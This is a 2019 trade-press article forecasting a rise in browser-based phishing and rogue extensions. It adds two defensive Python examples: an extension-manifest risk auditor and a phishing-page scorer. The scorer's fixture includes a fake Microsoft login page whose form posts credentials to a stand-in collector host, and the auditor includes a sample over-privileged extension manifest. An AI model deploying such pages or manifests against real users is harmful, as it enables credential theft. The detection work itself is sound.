Dark Reading is part of the Informa Tech Division of Informa PLC


Endpoint Security | News Analysis - Security Now
1/2/2019 09:15 AM
Atif Mushtaq

Phishing & Social Engineering Attacks Will Rise in 2019

The rise of fileless attack techniques, along with other developments, is making phishing a much more serious problem for enterprise security. As we head into 2019, a new approach is needed.

The cybersecurity field has made great strides in recent years through improvements to email and web security solutions, next-gen antivirus solutions and overall network, operating system and browser hardening.

In turn, threat actors have changed their strategies, adopting hard-to-detect, fileless phishing attacks that exploit the more vulnerable human attack surface. (See New Worm Helps Spread Fileless Version of Bladabindi RAT.)

The threat landscape for 2019 is evolving as new phishing and social engineering vectors and methods appear. These threats are rapidly moving beyond phishing emails with malicious attachments toward browser-based vectors designed to trick users into divulging sensitive information, or into installing man-in-the-browser snoopware that runs stealthily in browser memory.

In short, CSOs and security managers must focus on the growing number of threats that rely on malicious sites, whichever phishing vector delivers the link.

In 2019, cybercriminals will continue to use phishing emails, though the share of phishing emails carrying malicious attachments will decline as the share carrying malicious links keeps growing. Phishing vectors beyond email will also expand: ads, pop-ups, social media and chat applications. Attackers are also building seemingly legitimate browser extensions that provide genuinely useful functionality.

However, these rogue extensions can also act as snoopware, surreptitiously capturing credentials that enable further attacks on the machine or the corporate network.
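What makes an extension capable of this kind of snooping is visible in its manifest before any code runs: a content script matched against every site can read every login form, and broad host access combined with traffic or session APIs (webRequest, cookies, clipboardRead) gives the same reach without a content script. The following audit is an added example, not code from the article or from SlashNext; the two manifests are constructed for illustration, and the permission shortlist and "high/medium/low" thresholds are the author's own assumptions rather than a Chrome or vendor standard.

```python
import json
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Match patterns that put every site in scope for a content script or webRequest listener.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
BROAD_HOST_RE = re.compile(r"^(\*|https?|file|ftp)://\*/")  # e.g. "*://*/some/path*"

# Chrome permissions that expose traffic, sessions or user input beyond the page DOM.
# Assumption: this shortlist is illustrative, not an exhaustive risk list.
SENSITIVE_PERMISSIONS = {
    "webRequest", "webRequestBlocking", "cookies", "clipboardRead",
    "history", "debugger", "nativeMessaging", "proxy",
}


def is_broad_host(pattern: str) -> bool:
    """True if a host/match pattern covers every origin rather than a named site."""
    return pattern in BROAD_HOST_PATTERNS or bool(BROAD_HOST_RE.match(pattern))


def assess(manifest: Dict) -> Tuple[str, List[str]]:
    """Rate one extension manifest (MV2 or MV3) and list the reasons."""
    findings: List[str] = []
    # Some MV2 manifests carry dict-valued permissions (e.g. usbDevices); keep strings only.
    perms = {p for p in manifest.get("permissions", []) if isinstance(p, str)}
    # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
    host_patterns = perms | set(manifest.get("host_permissions", []))
    broad_hosts = sorted(p for p in host_patterns if is_broad_host(p))
    if broad_hosts:
        findings.append(f"broad host access: {broad_hosts}")
    sensitive = sorted(perms & SENSITIVE_PERMISSIONS)
    if sensitive:
        findings.append(f"sensitive API permissions: {sensitive}")
    all_site_scripts = 0
    for cs in manifest.get("content_scripts", []):
        broad = [m for m in cs.get("matches", []) if is_broad_host(m)]
        if broad:
            all_site_scripts += 1
            findings.append(
                f"content script injected into every site ({', '.join(broad)}; "
                f"run_at={cs.get('run_at', 'document_idle')}, all_frames={cs.get('all_frames', False)})"
            )
    # A script running in every page can read every login form by itself; broad host access
    # plus a traffic/session API is the webRequest-style route to the same data.
    if all_site_scripts or (broad_hosts and sensitive):
        risk = "high"
    elif findings:
        risk = "medium"
    else:
        risk = "low"
    return risk, findings


def audit_profile(extensions_root: Path) -> Dict[str, Tuple[str, str, List[str]]]:
    """Assess every <id>/<version>/manifest.json under a Chrome profile's Extensions folder."""
    results = {}
    for manifest_path in sorted(extensions_root.glob("*/*/manifest.json")):
        with manifest_path.open(encoding="utf-8-sig") as fh:  # some manifests carry a BOM
            manifest = json.load(fh)
        ext_id = manifest_path.parent.parent.name
        risk, findings = assess(manifest)
        results[ext_id] = (manifest.get("name", ext_id), risk, findings)
    return results


# Constructed sample manifests (not real extensions).
BENIGN_MANIFEST = {
    "manifest_version": 3, "name": "Example Notes",
    "permissions": ["storage", "activeTab"],
    "content_scripts": [{"matches": ["https://notes.example.com/*"], "js": ["notes.js"]}],
}
ROGUE_MANIFEST = {
    "manifest_version": 2, "name": "PDF Helper",
    "permissions": ["<all_urls>", "webRequest", "webRequestBlocking", "cookies", "clipboardRead", "storage"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"],
                         "run_at": "document_start", "all_frames": True}],
}

if __name__ == "__main__":
    for m in (BENIGN_MANIFEST, ROGUE_MANIFEST):
        risk, findings = assess(m)
        print(m["name"], risk, *findings, sep="\n  ")
```

Point `audit_profile` at a profile's `Extensions` directory (for Chrome on Windows, `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions`) to get a per-extension risk table; a "high" result is a candidate for removal or for an enterprise policy that allowlists approved extensions rather than blocklisting known-bad IDs.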

The battlefield is shifting to compromised websites

With anti-phishing solutions becoming more adept at spotting newly registered or otherwise suspicious domains, attackers are expanding their use of normally benign but compromised websites to host their phishing pages. Because the hosting domain has an established, clean reputation, the page is far less likely to be caught by URL filtering and web isolation technologies that key on domain reputation.

An ecosystem of bad actors is emerging to support this activity. Our threat researchers have noticed a growing number of login credentials for otherwise benign websites being offered for sale on the Dark Web. (See Watch Out: The Dark Web Is Really Watching You.)

Let's be clear -- the concern is not about the browser itself becoming exploited through a software vulnerability.

The most popular browsers are being made more secure all the time. The real issue is the widening variety of ways users are tricked into adding malicious browser extensions, or into clicking a link that silently installs snoopware in browser memory.

Most security teams are aware of these new threats, but they are unclear on how to respond. URL blocking, whether enforced by a firewall, proxy or web gateway, only works when the malicious URL is already known, and attackers have become skilled at quickly standing up new, as-yet-unclassified pages, often on compromised legitimate sites, and taking them down again within hours to avoid detection.

By the time such pages are discovered and blocked, the attack is usually over and the attackers have moved on. This has given rise to anti-phishing technologies that detect phishing sites in real time, or pre-emptively, rather than relying on blocklists.
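Real-time detection of a phishing page on a compromised site cannot depend on the domain, so it has to look at the page itself: a form with a password field whose action posts credentials to a different domain than the one serving the page, a title impersonating a brand the hosting domain has nothing to do with, and a login page served out of a CMS upload or cache directory that a defaced site would have writable. The scorer below is an added example, not the article's or SlashNext's detection logic; the two pages and their URLs are constructed, the brand list is illustrative, and the "registrable domain" helper is a deliberate simplification (a real deployment would use the Public Suffix List).

```python
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect the <title> text and, for each <form>, its action and whether it has a password field."""

    def __init__(self) -> None:
        super().__init__()
        self.title_parts: List[str] = []
        self.forms: List[Dict] = []
        self._in_title = False
        self._current: Dict = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "form":
            self._current = None

    def handle_data(self, data):
        if self._in_title:
            self.title_parts.append(data)


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname. Assumption: good enough for the demo, wrong for co.uk-style suffixes."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


# Illustrative brand list; an enterprise would use the names it actually expects to be impersonated.
BRANDS = ("microsoft", "paypal", "examplebank")

# Paths on a CMS that are writable to an attacker who has the site's credentials or a plugin bug.
WRITABLE_PATH_HINTS = ("/wp-content/", "/wp-includes/", "/uploads/", "/cache/", "/tmp/")


def score_page(page_url: str, html: str) -> Tuple[str, List[str]]:
    """Return (verdict, findings) for one fetched page, judged on content rather than domain reputation."""
    scanner = _FormScanner()
    scanner.feed(html)
    page = urlsplit(page_url)
    page_domain = registrable_domain(page.hostname or "")
    findings: List[str] = []
    cred_forms = [f for f in scanner.forms if f["has_password"]]
    for form in cred_forms:
        target = urlsplit(urljoin(page_url, form["action"]))  # relative actions resolve to the page itself
        if target.scheme == "http":
            findings.append("credential form submits over plaintext HTTP")
        if registrable_domain(target.hostname or "") != page_domain:
            findings.append(f"credential form posts to a different domain: {target.hostname}")
    title = " ".join(scanner.title_parts).lower()
    impersonated = [b for b in BRANDS if b in title and b not in page_domain]
    if cred_forms and impersonated:
        findings.append(f"login page titled for {impersonated} but hosted on {page_domain}")
    if cred_forms and any(hint in page.path.lower() for hint in WRITABLE_PATH_HINTS):
        findings.append(f"credential form served from a writable CMS/upload path: {page.path}")
    if len(findings) >= 2:
        verdict = "likely phishing"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, findings


# Constructed samples: a phishing page planted on a compromised small-business site, and that site's real login.
PHISH_URL = "https://bakery-example.com/wp-content/uploads/2018/12/secure/login.htm"
PHISH_HTML = """<html><head><title>Sign in to your Microsoft account</title></head><body>
<form method="post" action="https://collect.example.net/post.php">
<input name="login" type="email"><input name="passwd" type="password"><button>Sign in</button>
</form></body></html>"""
LEGIT_URL = "https://bakery-example.com/account/login"
LEGIT_HTML = """<html><head><title>Bakery Example - Sign in</title></head><body>
<form method="post" action="/account/login">
<input name="email" type="email"><input name="password" type="password"><button>Sign in</button>
</form></body></html>"""

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (LEGIT_URL, LEGIT_HTML)):
        verdict, findings = score_page(url, html)
        print(url, verdict, *findings, sep="\n  ")
```

Run against the HTML an isolation proxy or sandboxed fetcher has already retrieved for a clicked link; the point is that the verdict comes from what the page does with a password field, so it is reached on first sight rather than after the URL has been reported and added to a list.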

Fresh approaches to thwarting phishing

Cybercriminals are increasingly turning to social engineering attacks that exploit the human attack surface to evade existing safeguards and gain entry to corporate networks.

These new threats don't directly target the device, the software or the network. The primary target is the employee behind the browser; in other words, the most vulnerable link in the chain is the end user. With more than 4 billion Internet users, each owning a few connected devices, and with web usage increasingly central to everyday business tasks, the scope of the problem is clear.

Security teams will need to deploy new tools and strategies that block web-based phishing before users are duped into actions that compromise their organizations. Ongoing phishing awareness training for employees should be part of any layered security strategy, as should anti-phishing solutions that can detect and help block live web-based phishing threats.

Clearly, this is an ongoing game of cat and mouse, with 2019 promising even more sophisticated phishing attacks designed to manipulate users. As Google and other browser makers crack down on rogue browser extensions and apps, rogue extension makers will devise new ways to avoid detection. (See Google Chrome 71: Bugs Squashed & New Ways to Block 'Abusive Experiences'.)

With so much sensitive information passing through the browser via cloud-based apps and cloud storage, tricking users into granting a man-in-the-browser foothold for snooping is simply too tempting a target for cybercriminals.

Atif Mushtaq has spent most of his career on the front lines of the war against cybercrime. Before founding SlashNext, he spent nine years as a senior scientist at FireEye, where he was one of the main architects of FireEye's core malware detection system. Mushtaq has worked with law enforcement and other global agencies to take down some of the world’s biggest malware networks.
